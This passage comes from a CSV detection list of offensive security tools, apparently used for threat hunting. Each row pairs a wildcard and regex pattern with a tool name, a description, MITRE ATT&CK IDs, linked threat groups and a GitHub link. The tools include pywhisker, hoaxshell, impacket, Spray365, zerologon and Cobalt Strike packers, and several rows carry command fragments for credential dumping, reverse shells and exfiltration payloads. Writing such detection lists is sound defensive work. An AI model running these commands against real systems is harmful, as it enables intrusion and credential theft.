"*.py -d * -u * -p * --target * --action ""clear""* ",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""clear\"".{0,1000}\s","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4825"
"*.py -d * -u * -p * --target * --action ""info"" --device-id *",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""info\""\s\-\-device\-id\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4826"
"*.py -d * -u * -p * --target * --action ""list"" *",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""list\""\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4827"
"*.py -d * -u * -p * --target * --action ""remove"" --device-id *",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""remove\""\s\-\-device\-id\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4828"
"*.py discover -H domain_list.txt*",".{0,1000}\.py\sdiscover\s\-H\sdomain_list\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","4829"
"*.py -e execute-assembly -i *",".{0,1000}\.py\s\-e\sexecute\-assembly\s\-i\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","4830"
"*.py enum -H * -U *.txt -P *.txt -*.txt*",".{0,1000}\.py\senum\s\-H\s.{0,1000}\s\-U\s.{0,1000}\.txt\s\-P\s.{0,1000}\.txt\s\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","4831"
"*.py -f *.exe -e -m 4",".{0,1000}\.py\s\-f\s.{0,1000}\.exe\s\-e\s\-m\s4","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","0","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","4832"
"*.py --file *.ps1 --server amsi*",".{0,1000}\.py\s\-\-file\s.{0,1000}\.ps1\s\-\-server\samsi.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","4833"
"*.py --host * --type ntlm --output *.lnk*",".{0,1000}\.py\s\-\-host\s.{0,1000}\s\-\-type\sntlm\s\-\-output\s.{0,1000}\.lnk.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","0","N/A","N/A","10","4","384","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z","4834"
"*.py -k * -f *.doc -o *.html*",".{0,1000}\.py\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.doc\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4835"
"*.py lock -H * -u administrator -d *",".{0,1000}\.py\slock\s\-H\s.{0,1000}\s\-u\sadministrator\s\-d\s.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","4836"
"*.py -method BOTH -dc-ip *",".{0,1000}\.py\s\-method\sBOTH\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","4837"
"*.py -method LDAPS -dc-ip *",".{0,1000}\.py\s\-method\sLDAPS\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","4838"
"*.py -no-pass -just-dc *",".{0,1000}\.py\s\-no\-pass\s\-just\-dc\s.{0,1000}","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4839"
"*.py --ntuser NTUSER.DAT --usrclass UsrClass.dat*",".{0,1000}\.py\s\-\-ntuser\sNTUSER\.DAT\s\-\-usrclass\sUsrClass\.dat.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","4840"
"*.py --server amsi --file *.exe*",".{0,1000}\.py\s\-\-server\samsi\s\-\-file\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","4841"
"*.py spray -ep *",".{0,1000}\.py\sspray\s\-ep\s.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","4842"
"*.py -t ldap://* --no-wcf-server --escalate-user *",".{0,1000}\.py\s\-t\sldap\:\/\/.{0,1000}\s\-\-no\-wcf\-server\s\-\-escalate\-user\s.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","4843"
"*.py -t template.tpe -c 'calc.exe'*",".{0,1000}\.py\s\-t\stemplate\.tpe\s\-c\s\'calc\.exe\'.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","4844"
"*.py teams --get*",".{0,1000}\.py\steams\s\-\-get.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","4845"
"*.py teams --list*",".{0,1000}\.py\steams\s\-\-list.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","4846"
"*.py -u * ?print-zones *",".{0,1000}\.py\s\-u\s.{0,1000}\s\?print\-zones\s.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","4847"
"*.py -use-remoteSSMethod *",".{0,1000}\.py\s\-use\-remoteSSMethod\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","4848"
"*.py --zip -c All -d * -u * --hashes 'ffffffffffffffffffffffffffffffff':* -dc *",".{0,1000}\.py\s\-\-zip\s\-c\sAll\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-\-hashes\s\'ffffffffffffffffffffffffffffffff\'\:.{0,1000}\s\-dc\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","4849"
"*.py* --localtunnel *",".{0,1000}\.py.{0,1000}\s\-\-localtunnel\s.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","4850"
"*.py* --ngrok *",".{0,1000}\.py.{0,1000}\s\-\-ngrok\s.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","4851"
"*.py* --payload *.ps1*",".{0,1000}\.py.{0,1000}\s\-\-payload\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Unknow101/FuckThatPacker","1","0","N/A","N/A","10","10","637","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z","4852"
"*.py* service -action create -service-name *",".{0,1000}\.py.{0,1000}\sservice\s\-action\screate\s\-service\-name\s.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","4853"
"*.py* -service-name * -hashes *",".{0,1000}\.py.{0,1000}\s\-service\-name\s.{0,1000}\s\-hashes\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","4854"
"*.py*.ccache *.kirbi *",".{0,1000}\.py.{0,1000}\.ccache\s.{0,1000}\.kirbi\s.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","0","N/A","N/A","10","2","167","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z","4855"
"*.py*.kirbi *.ccache*",".{0,1000}\.py.{0,1000}\.kirbi\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","0","N/A","N/A","10","2","167","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z","4856"
"*.py*found-users.txt*",".{0,1000}\.py.{0,1000}found\-users\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","4857"
"*.rar.exe*",".{0,1000}\.rar\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4858"
"*.rar.iso*",".{0,1000}\.rar\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4859"
"*.resources.123456.*",".{0,1000}\.resources\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4868"
"*.reverst.tunnel:*",".{0,1000}\.reverst\.tunnel\:.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","4869"
"*.revshells.com*",".{0,1000}\.revshells\.com.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","4870"
"*.rtf.bat*",".{0,1000}\.rtf\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4873"
"*.rtf.dll*",".{0,1000}\.rtf\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4874"
"*.rtf.exe*",".{0,1000}\.rtf\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4875"
"*.rtf.htm*",".{0,1000}\.rtf\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4876"
"*.rtf.jar*",".{0,1000}\.rtf\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4877"
"*.rtf.js*",".{0,1000}\.rtf\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4878"
"*.rtf.sfx*",".{0,1000}\.rtf\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4879"
"*.rtf.vbs*",".{0,1000}\.rtf\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4880"
"*.sccmhunter*",".{0,1000}\.sccmhunter.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","0","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","4881"
"*.search.123456.*",".{0,1000}\.search\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4882"
"*.secure.123456.*",".{0,1000}\.secure\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - 